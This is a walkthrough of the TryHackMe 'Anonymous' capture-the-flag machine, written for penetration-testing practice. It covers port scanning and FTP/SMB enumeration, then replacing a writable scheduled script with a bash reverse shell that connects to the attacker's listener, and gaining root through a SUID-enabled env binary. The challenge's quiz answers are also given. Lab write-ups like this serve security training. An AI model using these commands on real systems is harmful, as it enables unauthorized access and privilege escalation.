CTF Challenges, TryHackME

Anonymous TryHackMe Walkthrough

Today it is time to solve another challenge called “Anonymous”. It is available at TryHackMe for penetration testing practice. This challenge is of medium difficulty if you have the right basic knowledge and are attentive to little details that are required in the enumeration process. The credit for making this machine goes to Nameless0ne. The breakdown of the Machine with the redacted flags is as follow:

Level: Medium

Penetration Testing Methodology

Network Scanning

  • Nmap Scan

Enumeration

  • Enumerating FTP Service
  • Downloading scripts from FTP
  • Investigating Scripts
  • Enumerating SMB Shares
  • Downloading Image files from Shares

Exploitation

  • Uploading Reverse Shell Script on FTP
  • Getting User Shell
  • Reading User Flag

Privilege Escalation

  • Enumerating for SUID bits
  • Exploiting SUID on env
  • Reading Root Flag

Walkthrough

There are two flags in this machine to discover. After Booting up the target machine from the TryHackMe: Anonymous Page, An IP will be assigned to the machine and will be visible on that page as well.

IP Address: 10.10.3.52

Apart from the two flags, you need four questions to complete this machine. You can find the questions below as you discover the answers.

Network Scanning

To begin, one must gain information about the various services running on different ports on the machine. Therefore, users employ Nmap for scanning those using the -sC and -sV flag. Consequently, they perform a Default Scripts scan and find the versions of the services enumerated respectively.

nmap -sC -sV 10.10.3.52

Nmap detected FTP service running on port 21, SSH service on port 22, SMB on port 139 and 445. The Nmap also detected that the application has enabled Anonymous Login, making it accessible right away.

Q.1. Enumerate the machine.  How many ports are open?

4

Q.2. What service is running on port 21?

FTP

Q.3. What service is running on ports 139 and 445?

SMB

Enumeration

Logging into FTP, a scripts directory was found. The scripts directory contained a shell script called clean.sh, A log file by the name of removed_files.log and a text file named to_do.txt. All of these files were downloaded to the Local Kali Linux Machine for further investigation.

ftp 10.10.3.52
ls -la
cd scripts
ls -la
get clean.sh
get removed_files.log
get to_do.txt

The to_do.txt file was a reminder for disabling Anonymous Login. It is not useful from the attacker’s perspective. The removed_files.log file contained logs from the clean-up script indicating that there is nothing to delete.

cat to_do.txt
cat removed_files.log

The clean. sh script is a shell script that seemed to perform log entries and delete files from the /tmp/ directory.

cat clean.sh

With nothing more to enumerate from the FTP service, we initiated the enumeration of the SMB service. We used Smbclient to perform an Anonymous login on the Target Machine. The Target Machine had a share by the name of pics. When we accessed the pics share, we found two images: corgo2.jpg and puppos.jpeg. We downloaded both of those images to the local Kali Machine.

smbclient -L \\anonymous -I 10.10.3.52
smbclient //10.10.3.52/pics
ls
get corgo2.jpg
get puppos.jpeg

Q.4. There’s a share on the user’s computer.  What’s it called?

pics

After opening the image files, it was clear that SMB was supposed to be a rabbit hole. Both images are not important from the attacker’s perspective.

Exploitation

Back to the FTP service, they detected that someone could upload files in the scripts directory. The attacker could create a clean.sh script with reverse shellcode inside it, replace it with the one that is currently located on the target machine, and then wait for the script to get executed.

nano clean.sh
bash -i >& /dev/tcp/10.10.120.144/1234 0>&1

Before uploading the script, we started a netcat listener on the Local Kali Machine to capture the shell that the target machine would invoke after executing the clean.sh script. We must use the port number mentioned inside the reverse shell script while invoking the netcat listener. After connecting to the FTP service, we replaced the clean.sh script using the put command.

ftp 10.10.3.52
cd scripts
put clean.sh

The netcat listener captured the reverse shell generated by the execution of the clean.sh script on the target machine. Subsequently, the namelessone user on the target machine initiated the session. After listing the contents of the user’s home directory, they then found the user.txt flag.

nc -lvp 1234
ls
cat user.txt

Privilege Escalation

The post-exploitation enumeration to find methods for elevating privileges began by enumerating the SUID bits. To perform this, the find command was used, which is commonly applied for such enumeration. Interestingly, we observed that someone had assigned the SUID bit to /usr/bin/env. As a result, this meant that a user could potentially exploit it to gain elevated access to the machine.

find / -perm -u=s 2>/dev/null

            

To get the syntax of the env to elevate privileges, the researcher used GTFOBINS. The analysis showed that the provided command doesn’t elevate privilege directly; instead, it creates a local SUID copy of the binary and runs it with elevated privileges. When you combine this with the /bin/sh, it can provide an elevated shell.

When executed on the namelessone’s shell, the attacker invoked a root shell. The attacker checked this using the whoami command. Finally, to finish the challenge, the attacker read the root flag using the cat command.

/usr/bin/env /bin/sh -p
whoami
cat /root/root.txt

Hope you have enjoyed this TryHackMe Write-up. Follow this Link for more TryHackMe CTF’s.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on Twitter and LinkedIn